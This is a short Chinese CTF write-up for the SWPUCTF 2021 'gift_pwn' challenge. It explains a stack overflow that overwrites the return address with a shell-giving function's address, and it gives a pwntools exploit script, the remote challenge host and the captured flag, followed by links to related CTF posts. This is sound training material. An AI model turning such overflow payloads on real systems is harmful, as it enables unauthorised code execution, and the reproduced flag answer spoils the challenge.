[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天

简介: [SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天

按照签到题的套路是找main,buf,shell,bin/sh/,这个是加了一个gift的地址

距离rbp 16字节,我们要再加上我们的8个字节

最后加上我们的返回地址,是上面找到的gift的地址,payload就完成了

from pwn import *
p = remote('node4.anna.nssctf.cn',28325)
payload = b'a' * 0x10 + b'a' * 8 + p64(0x4005b6)
p.send(payload)
p.interactive()

NSSCTF{7b6d2d8a-b6a5-4c40-bcdd-f4604c025219}


目录
相关文章
|
JSON PHP 数据格式
[SWPUCTF 2021 新生赛]jicao
[SWPUCTF 2021 新生赛]jicao
784 0
|
Shell
[NISACTF 2022]ezstack-入土为安的第十四天
[NISACTF 2022]ezstack-入土为安的第十四天
169 0
|
8月前
|
安全 测试技术 PHP
[NPUCTF2020]ReadlezPHP1怎么回事?
NPUCTF2020的ReadlezPHP1题目展示了文件包含漏洞的利用和防御。通过对PHP代码的审计,可以发现并利用文件包含漏洞来读取敏感文件或执行恶意代码。然而,通过严格限制用户输入、使用绝对路径、禁用URL包含和避免动态包含,可以有效地防御文件包含漏洞,从而提高Web应用的安全性。在实际开发中,应时刻保持安全意识,定期进行代码审计和安全测试,以防范潜在的安全风险。
227 36
|
Shell
[NISACTF 2022]ezpie- 入土为安的第十五天
[NISACTF 2022]ezpie- 入土为安的第十五天
246 0
|
算法 安全 Shell
2024i春秋第四届长城杯网络安全大赛暨京津冀网络安全技能竞赛初赛wp-flowershop+easyre
2024i春秋第四届长城杯网络安全大赛暨京津冀网络安全技能竞赛初赛wp-flowershop+easyre
447 1
|
安全 Shell PHP
escapeshellarg() 和 escapeshellcmd()
escapeshellarg() 和 escapeshellcmd()
|
SQL 存储 安全
CTF--Web安全--SQL注入之报错注入
CTF--Web安全--SQL注入之报错注入
|
缓存 PHP
[SWPUCTF 2021 新生赛]Do_you_know_http
[SWPUCTF 2021 新生赛]Do_you_know_http
994 0
BUUCTF 大白 1
BUUCTF 大白 1
456 0
|
存储 JSON 数据安全/隐私保护
[LitCTF 2023]Flag点击就送!(cookie伪造)
[LitCTF 2023]Flag点击就送!(cookie伪造)
578 0